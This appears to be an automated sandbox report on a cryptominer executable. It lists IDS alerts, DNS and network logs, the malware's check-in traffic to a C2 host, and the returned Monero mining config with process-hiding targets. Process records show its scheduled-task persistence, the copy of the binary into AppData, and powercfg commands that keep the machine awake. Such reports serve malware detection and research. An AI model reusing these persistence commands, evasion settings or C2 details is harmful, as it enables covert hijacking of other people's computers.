.rsrc | 0x4fe000 | 0x4be | 0x600 | 9708c20db4bfb475ebe5e623e4c938bb | False | 0.3873697916666667 | data | 3.8186402896367726 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x4fe05c | 0x23c | data | English | United States | 0.49125874125874125
RT_MANIFEST | 0x4fe2d4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | English | United States | 0.5469387755102041
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/18/24-17:51:14.723704 | TCP | 2051004 | ET TROJAN [ANY.RUN] SilentCryptoMiner Check-in POST Request | 49729 | 80 | 192.168.2.12 | 134.255.231.136
03/18/24-17:51:14.723704 | TCP | 2011341 | ET TROJAN Suspicious POST With Reference to WINDOWS Folder Possible Malware Infection | 49729 | 80 | 192.168.2.12 | 134.255.231.136
03/18/24-17:52:16.406978 | TCP | 2051004 | ET TROJAN [ANY.RUN] SilentCryptoMiner Check-in POST Request | 49734 | 80 | 192.168.2.12 | 134.255.231.136
03/18/24-17:52:16.406978 | TCP | 2011341 | ET TROJAN Suspicious POST With Reference to WINDOWS Folder Possible Malware Infection | 49734 | 80 | 192.168.2.12 | 134.255.231.136
03/18/24-17:50:15.279061 | TCP | 2051004 | ET TROJAN [ANY.RUN] SilentCryptoMiner Check-in POST Request | 49726 | 80 | 192.168.2.12 | 134.255.231.136
03/18/24-17:50:15.279061 | TCP | 2011341 | ET TROJAN Suspicious POST With Reference to WINDOWS Folder Possible Malware Infection | 49726 | 80 | 192.168.2.12 | 134.255.231.136
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 18, 2024 17:48:14.718401909 CET | 49709 | 10300 | 192.168.2.12 | 162.19.224.121
Mar 18, 2024 17:48:14.888763905 CET | 10300 | 49709 | 162.19.224.121 | 192.168.2.12
Mar 18, 2024 17:48:14.888842106 CET | 49709 | 10300 | 192.168.2.12 | 162.19.224.121
Mar 18, 2024 17:48:14.889739990 CET | 49709 | 10300 | 192.168.2.12 | 162.19.224.121
Mar 18, 2024 17:48:15.059904099 CET | 10300 | 49709 | 162.19.224.121 | 192.168.2.12
Mar 18, 2024 17:48:15.082243919 CET | 10300 | 49709 | 162.19.224.121 | 192.168.2.12
Mar 18, 2024 17:48:15.128329992 CET | 49709 | 10300 | 192.168.2.12 | 162.19.224.121
Mar 18, 2024 17:48:17.191934109 CET | 49710 | 80 | 192.168.2.12 | 134.255.231.136
Mar 18, 2024 17:48:17.361103058 CET | 80 | 49710 | 134.255.231.136 | 192.168.2.12
Mar 18, 2024 17:48:17.361206055 CET | 49710 | 80 | 192.168.2.12 | 134.255.231.136
Mar 18, 2024 17:48:17.530308962 CET | 80 | 49710 | 134.255.231.136 | 192.168.2.12
Mar 18, 2024 17:48:19.581017971 CET | 10300 | 49709 | 162.19.224.121 | 192.168.2.12
Mar 18, 2024 17:48:19.683351994 CET | 49709 | 10300 | 192.168.2.12 | 162.19.224.121
Mar 18, 2024 17:48:49.887906075 CET | 10300 | 49709 | 162.19.224.121 | 192.168.2.12
Mar 18, 2024 17:48:50.034601927 CET | 49709 | 10300 | 192.168.2.12 | 162.19.224.121
Mar 18, 2024 17:49:07.940336943 CET | 10300 | 49709 | 162.19.224.121 | 192.168.2.12
Mar 18, 2024 17:49:08.046107054 CET | 49709 | 10300 | 192.168.2.12 | 162.19.224.121
Mar 18, 2024 17:49:14.928920031 CET | 49723 | 80 | 192.168.2.12 | 134.255.231.136
Mar 18, 2024 17:49:15.100023031 CET | 80 | 49723 | 134.255.231.136 | 192.168.2.12
Mar 18, 2024 17:49:15.100110054 CET | 49723 | 80 | 192.168.2.12 | 134.255.231.136
Mar 18, 2024 17:49:15.267786026 CET | 80 | 49723 | 134.255.231.136 | 192.168.2.12
Mar 18, 2024 17:49:17.649784088 CET | 10300 | 49709 | 162.19.224.121 | 192.168.2.12
Mar 18, 2024 17:49:17.847065926 CET | 49709 | 10300 | 192.168.2.12 | 162.19.224.121
Mar 18, 2024 17:49:32.876439095 CET | 10300 | 49709 | 162.19.224.121 | 192.168.2.12
Mar 18, 2024 17:49:33.050199032 CET | 49709 | 10300 | 192.168.2.12 | 162.19.224.121
Mar 18, 2024 17:49:41.456887007 CET | 10300 | 49709 | 162.19.224.121 | 192.168.2.12
Mar 18, 2024 17:49:41.550215006 CET | 49709 | 10300 | 192.168.2.12 | 162.19.224.121
Mar 18, 2024 17:50:12.813944101 CET | 10300 | 49709 | 162.19.224.121 | 192.168.2.12
Mar 18, 2024 17:50:13.034609079 CET | 49709 | 10300 | 192.168.2.12 | 162.19.224.121
Mar 18, 2024 17:50:15.110306978 CET | 49726 | 80 | 192.168.2.12 | 134.255.231.136
Mar 18, 2024 17:50:15.278548002 CET | 80 | 49726 | 134.255.231.136 | 192.168.2.12
Mar 18, 2024 17:50:15.278712988 CET | 49726 | 80 | 192.168.2.12 | 134.255.231.136
Mar 18, 2024 17:50:15.279061079 CET | 49726 | 80 | 192.168.2.12 | 134.255.231.136
Mar 18, 2024 17:50:15.494668007 CET | 80 | 49726 | 134.255.231.136 | 192.168.2.12
Mar 18, 2024 17:50:15.494754076 CET | 49726 | 80 | 192.168.2.12 | 134.255.231.136
Mar 18, 2024 17:50:15.669949055 CET | 80 | 49726 | 134.255.231.136 | 192.168.2.12
Mar 18, 2024 17:50:15.669976950 CET | 80 | 49726 | 134.255.231.136 | 192.168.2.12
Mar 18, 2024 17:50:15.670068026 CET | 49726 | 80 | 192.168.2.12 | 134.255.231.136
Mar 18, 2024 17:50:15.686455011 CET | 49726 | 80 | 192.168.2.12 | 134.255.231.136
Mar 18, 2024 17:50:15.854403973 CET | 80 | 49726 | 134.255.231.136 | 192.168.2.12
Mar 18, 2024 17:50:32.923330069 CET | 10300 | 49709 | 162.19.224.121 | 192.168.2.12
Mar 18, 2024 17:50:33.034656048 CET | 49709 | 10300 | 192.168.2.12 | 162.19.224.121
Mar 18, 2024 17:50:55.706307888 CET | 10300 | 49709 | 162.19.224.121 | 192.168.2.12
Mar 18, 2024 17:50:55.847178936 CET | 49709 | 10300 | 192.168.2.12 | 162.19.224.121
Mar 18, 2024 17:51:05.829668045 CET | 10300 | 49709 | 162.19.224.121 | 192.168.2.12
Mar 18, 2024 17:51:06.034663916 CET | 49709 | 10300 | 192.168.2.12 | 162.19.224.121
Mar 18, 2024 17:51:14.555223942 CET | 49729 | 80 | 192.168.2.12 | 134.255.231.136
Mar 18, 2024 17:51:14.723227978 CET | 80 | 49729 | 134.255.231.136 | 192.168.2.12
Mar 18, 2024 17:51:14.723372936 CET | 49729 | 80 | 192.168.2.12 | 134.255.231.136
Mar 18, 2024 17:51:14.723704100 CET | 49729 | 80 | 192.168.2.12 | 134.255.231.136
Mar 18, 2024 17:51:14.932759047 CET | 80 | 49729 | 134.255.231.136 | 192.168.2.12
Mar 18, 2024 17:51:14.932852030 CET | 49729 | 80 | 192.168.2.12 | 134.255.231.136
Mar 18, 2024 17:51:15.107620001 CET | 80 | 49729 | 134.255.231.136 | 192.168.2.12
Mar 18, 2024 17:51:15.107651949 CET | 80 | 49729 | 134.255.231.136 | 192.168.2.12
Mar 18, 2024 17:51:15.107976913 CET | 49729 | 80 | 192.168.2.12 | 134.255.231.136
Mar 18, 2024 17:51:15.108067989 CET | 49729 | 80 | 192.168.2.12 | 134.255.231.136
Mar 18, 2024 17:51:15.229346037 CET | 49709 | 10300 | 192.168.2.12 | 162.19.224.121
Mar 18, 2024 17:51:15.276097059 CET | 80 | 49729 | 134.255.231.136 | 192.168.2.12
Mar 18, 2024 17:51:15.318794012 CET | 49730 | 10300 | 192.168.2.12 | 54.37.137.114
Mar 18, 2024 17:51:15.442554951 CET | 10300 | 49709 | 162.19.224.121 | 192.168.2.12
Mar 18, 2024 17:51:15.511567116 CET | 10300 | 49730 | 54.37.137.114 | 192.168.2.12
Mar 18, 2024 17:51:15.511662960 CET | 49730 | 10300 | 192.168.2.12 | 54.37.137.114
Mar 18, 2024 17:51:15.511854887 CET | 49730 | 10300 | 192.168.2.12 | 54.37.137.114
Mar 18, 2024 17:51:15.655747890 CET | 10300 | 49709 | 162.19.224.121 | 192.168.2.12
Mar 18, 2024 17:51:15.655814886 CET | 49709 | 10300 | 192.168.2.12 | 162.19.224.121
Mar 18, 2024 17:51:15.704336882 CET | 10300 | 49730 | 54.37.137.114 | 192.168.2.12
Mar 18, 2024 17:51:15.899060011 CET | 10300 | 49730 | 54.37.137.114 | 192.168.2.12
Mar 18, 2024 17:51:15.940933943 CET | 49730 | 10300 | 192.168.2.12 | 54.37.137.114
Mar 18, 2024 17:51:25.575196981 CET | 10300 | 49730 | 54.37.137.114 | 192.168.2.12
Mar 18, 2024 17:51:25.644056082 CET | 49730 | 10300 | 192.168.2.12 | 54.37.137.114
Mar 18, 2024 17:51:35.588215113 CET | 10300 | 49730 | 54.37.137.114 | 192.168.2.12
Mar 18, 2024 17:51:35.641866922 CET | 49730 | 10300 | 192.168.2.12 | 54.37.137.114
Mar 18, 2024 17:51:44.671947956 CET | 10300 | 49730 | 54.37.137.114 | 192.168.2.12
Mar 18, 2024 17:51:44.847145081 CET | 49730 | 10300 | 192.168.2.12 | 54.37.137.114
Mar 18, 2024 17:51:56.332016945 CET | 10300 | 49730 | 54.37.137.114 | 192.168.2.12
Mar 18, 2024 17:51:56.534713030 CET | 49730 | 10300 | 192.168.2.12 | 54.37.137.114
Mar 18, 2024 17:52:05.856236935 CET | 10300 | 49730 | 54.37.137.114 | 192.168.2.12
                                      Mar 18, 2024 17:52:06.050369024 CET4973010300192.168.2.1254.37.137.114
                                      Mar 18, 2024 17:52:16.050739050 CET4973480192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:52:16.218507051 CET8049734134.255.231.136192.168.2.12
                                      Mar 18, 2024 17:52:16.218651056 CET4973480192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:52:16.406977892 CET4973480192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:52:16.620661020 CET8049734134.255.231.136192.168.2.12
                                      Mar 18, 2024 17:52:16.620801926 CET4973480192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:52:16.795351982 CET8049734134.255.231.136192.168.2.12
                                      Mar 18, 2024 17:52:16.795386076 CET8049734134.255.231.136192.168.2.12
                                      Mar 18, 2024 17:52:16.795449018 CET4973480192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:52:16.795769930 CET4973480192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:52:16.963506937 CET8049734134.255.231.136192.168.2.12
                                      Mar 18, 2024 17:52:22.677942038 CET103004973054.37.137.114192.168.2.12
                                      Mar 18, 2024 17:52:22.820596933 CET4973010300192.168.2.1254.37.137.114
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 18, 2024 17:48:14.622180939 CET | 65264 | 53 | 192.168.2.12 | 1.1.1.1
Mar 18, 2024 17:48:14.712208033 CET | 53 | 65264 | 1.1.1.1 | 192.168.2.12
Mar 18, 2024 17:48:17.066319942 CET | 53283 | 53 | 192.168.2.12 | 1.1.1.1
Mar 18, 2024 17:48:17.164257050 CET | 53 | 53283 | 1.1.1.1 | 192.168.2.12
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 18, 2024 17:48:14.622180939 CET | 192.168.2.12 | 1.1.1.1 | 0x1033 | Standard query (0) | xmr-eu1.nanopool.org | A (IP address) | IN (0x0001) | false
Mar 18, 2024 17:48:17.066319942 CET | 192.168.2.12 | 1.1.1.1 | 0x505b | Standard query (0) | cf-protected-l7.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 18, 2024 17:48:14.712208033 CET | 1.1.1.1 | 192.168.2.12 | 0x1033 | No error (0) | xmr-eu1.nanopool.org | | 141.94.23.83 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 17:48:14.712208033 CET | 1.1.1.1 | 192.168.2.12 | 0x1033 | No error (0) | xmr-eu1.nanopool.org | | 51.15.58.224 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 17:48:14.712208033 CET | 1.1.1.1 | 192.168.2.12 | 0x1033 | No error (0) | xmr-eu1.nanopool.org | | 51.15.193.130 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 17:48:14.712208033 CET | 1.1.1.1 | 192.168.2.12 | 0x1033 | No error (0) | xmr-eu1.nanopool.org | | 51.89.23.91 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 17:48:14.712208033 CET | 1.1.1.1 | 192.168.2.12 | 0x1033 | No error (0) | xmr-eu1.nanopool.org | | 162.19.224.121 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 17:48:14.712208033 CET | 1.1.1.1 | 192.168.2.12 | 0x1033 | No error (0) | xmr-eu1.nanopool.org | | 163.172.154.142 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 17:48:14.712208033 CET | 1.1.1.1 | 192.168.2.12 | 0x1033 | No error (0) | xmr-eu1.nanopool.org | | 54.37.137.114 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 17:48:14.712208033 CET | 1.1.1.1 | 192.168.2.12 | 0x1033 | No error (0) | xmr-eu1.nanopool.org | | 212.47.253.124 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 17:48:14.712208033 CET | 1.1.1.1 | 192.168.2.12 | 0x1033 | No error (0) | xmr-eu1.nanopool.org | | 54.37.232.103 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 17:48:14.712208033 CET | 1.1.1.1 | 192.168.2.12 | 0x1033 | No error (0) | xmr-eu1.nanopool.org | | 146.59.154.106 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 17:48:14.712208033 CET | 1.1.1.1 | 192.168.2.12 | 0x1033 | No error (0) | xmr-eu1.nanopool.org | | 51.15.65.182 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 17:48:17.164257050 CET | 1.1.1.1 | 192.168.2.12 | 0x505b | No error (0) | cf-protected-l7.com | | 134.255.231.136 | A (IP address) | IN (0x0001) | false
                                      • cf-protected-l7.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.12 | 49726 | 134.255.231.136 | 80 | 4112 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 17:50:15.279061079 CET | 179 | OUT | POST /api/endpoint.php HTTP/1.1
                                      Accept: */*
                                      Connection: close
                                      Content-Length: 522
                                      Content-Type: application/json
                                      Host: cf-protected-l7.com
                                      User-Agent: cpp-httplib/0.12.6
Mar 18, 2024 17:50:15.494754076 CET | 522 | OUT | Data Raw: 7b 22 69 64 22 3a 22 74 6d 73 6e 6e 70 72 70 62 76 6e 66 7a 6f 6b 72 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 34 36 38 33 32 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 6c 62 75 73 22 2c 22 67 70 75 22 3a 22 42 46 32 44 46 22 2c
                                      Data Ascii: {"id":"tmsnnprpbvnfzokr","computername":"468325","username":"user","gpu":"BF2DF","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"C:\\Windows\\explorer.
Mar 18, 2024 17:50:15.669949055 CET | 267 | IN | HTTP/1.1 200 OK
                                      Date: Tue, 19 Mar 2024 00:50:12 GMT
                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                      X-Robots-Tag: noindex, nofollow
                                      X-Powered-By: PHP/8.0.30
                                      Content-Length: 17
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 7b 22 72 65 73 70 6f 6e 73 65 22 3a 22 6f 6b 22 7d
                                      Data Ascii: {"response":"ok"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.12 | 49729 | 134.255.231.136 | 80 | 4112 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 17:51:14.723704100 CET | 179 | OUT | POST /api/endpoint.php HTTP/1.1
                                      Accept: */*
                                      Connection: close
                                      Content-Length: 523
                                      Content-Type: application/json
                                      Host: cf-protected-l7.com
                                      User-Agent: cpp-httplib/0.12.6
Mar 18, 2024 17:51:14.932852030 CET | 523 | OUT | Data Raw: 7b 22 69 64 22 3a 22 74 6d 73 6e 6e 70 72 70 62 76 6e 66 7a 6f 6b 72 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 34 36 38 33 32 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 6c 62 75 73 22 2c 22 67 70 75 22 3a 22 42 46 32 44 46 22 2c
                                      Data Ascii: {"id":"tmsnnprpbvnfzokr","computername":"468325","username":"user","gpu":"BF2DF","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"C:\\Windows\\explorer.
Mar 18, 2024 17:51:15.107620001 CET | 730 | IN | HTTP/1.1 200 OK
                                      Date: Tue, 19 Mar 2024 00:51:11 GMT
                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                      X-Robots-Tag: noindex, nofollow
                                      X-Powered-By: PHP/8.0.30
                                      Content-Length: 479
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: { "algo": "rx/0", "pool": "xmr-eu1.nanopool.org", "port": 10300, "wallet": "49pXA5CU5H8jNb4x6ADM7vGFk4e8z11jB9AjxcFBc69wRZXfPjgnjFkFzLTkm5w33FK3Y1zYvJFJcedEL5PdUnZP1Epmxhx", "password": "", "nicehash": false, "ssltls": false, "max-cpu": 50, "idle-wait": 15, "idle-cpu": 100, "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe", "kill-targets": "", "stealth-fullscreen": true}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.12 | 49734 | 134.255.231.136 | 80 | 4112 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 17:52:16.406977892 CET | 179 | OUT | POST /api/endpoint.php HTTP/1.1
                                      Accept: */*
                                      Connection: close
                                      Content-Length: 523
                                      Content-Type: application/json
                                      Host: cf-protected-l7.com
                                      User-Agent: cpp-httplib/0.12.6
Mar 18, 2024 17:52:16.620801926 CET | 523 | OUT | Data Raw: 7b 22 69 64 22 3a 22 74 6d 73 6e 6e 70 72 70 62 76 6e 66 7a 6f 6b 72 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 34 36 38 33 32 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 6c 62 75 73 22 2c 22 67 70 75 22 3a 22 42 46 32 44 46 22 2c
                                      Data Ascii: {"id":"tmsnnprpbvnfzokr","computername":"468325","username":"user","gpu":"BF2DF","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"C:\\Windows\\explorer.
Mar 18, 2024 17:52:16.795351982 CET | 730 | IN | HTTP/1.1 200 OK
                                      Date: Tue, 19 Mar 2024 00:52:13 GMT
                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                      X-Robots-Tag: noindex, nofollow
                                      X-Powered-By: PHP/8.0.30
                                      Content-Length: 479
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: { "algo": "rx/0", "pool": "xmr-eu1.nanopool.org", "port": 10300, "wallet": "49pXA5CU5H8jNb4x6ADM7vGFk4e8z11jB9AjxcFBc69wRZXfPjgnjFkFzLTkm5w33FK3Y1zYvJFJcedEL5PdUnZP1Epmxhx", "password": "", "nicehash": false, "ssltls": false, "max-cpu": 50, "idle-wait": 15, "idle-cpu": 100, "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe", "kill-targets": "", "stealth-fullscreen": true}



Target ID: 0
Start time: 17:48:11
Start date: 18/03/2024
Path: C:\Users\user\Desktop\ft1i6jvAdD.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\Desktop\ft1i6jvAdD.exe
Imagebase: 0x5e0000
File size: 5'227'008 bytes
MD5 hash: B03C2D7DF7EABC44F36397CB66AC3E77
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 17:48:12
Start date: 18/03/2024
Path: C:\Users\user\AppData\Local\Temp\ghghghg.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\ghghghg.exe"
Imagebase: 0x7ff7bb310000
File size: 5'191'680 bytes
MD5 hash: D3CD8232D7097DC4953B61B86AFD7FD2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 3
Start time: 17:48:12
Start date: 18/03/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
Imagebase: 0x7ff75d770000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 17:48:12
Start date: 18/03/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff704000000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 17:48:12
Start date: 18/03/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
Imagebase: 0x7ff75d770000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 17:48:12
Start date: 18/03/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd" /c copy "C:\Users\user\Desktop\ft1i6jvAdD.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
Imagebase: 0x7ff75d770000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 17:48:12
Start date: 18/03/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff704000000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 17:48:12
Start date: 18/03/2024
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Imagebase: 0x7ff7ef060000
File size: 96'256 bytes
MD5 hash: 9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 9
Start time: 17:48:12
Start date: 18/03/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff704000000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 17:48:12
Start date: 18/03/2024
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Imagebase: 0x7ff7ef060000
File size: 96'256 bytes
MD5 hash: 9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 11
Start time: 17:48:12
Start date: 18/03/2024
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Imagebase: 0x7ff7ef060000
File size: 96'256 bytes
MD5 hash: 9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 12
Start time: 17:48:12
Start date: 18/03/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff704000000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 17:48:12
Start date: 18/03/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff704000000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 14
Start time: 17:48:12
Start date: 18/03/2024
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Imagebase: 0x7ff7ef060000
File size: 96'256 bytes
MD5 hash: 9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 15
Start time: 17:48:12
Start date: 18/03/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff704000000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 16
Start time: 17:48:12
Start date: 18/03/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff704000000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

                                      Target ID:17
                                      Start time:17:48:12
                                      Start date:18/03/2024
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:explorer.exe
                                      Imagebase:0x7ff7d6c70000
                                      File size:5'141'208 bytes
                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000003.2347665199.0000000001421000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000003.4155726995.00000000031E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000002.4800541815.0000000001407000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000003.4155128655.000000000321E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000002.4800541815.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000003.4155775773.0000000003223000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000002.4801808070.00000000031D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000003.3273815403.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000003.4155583902.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
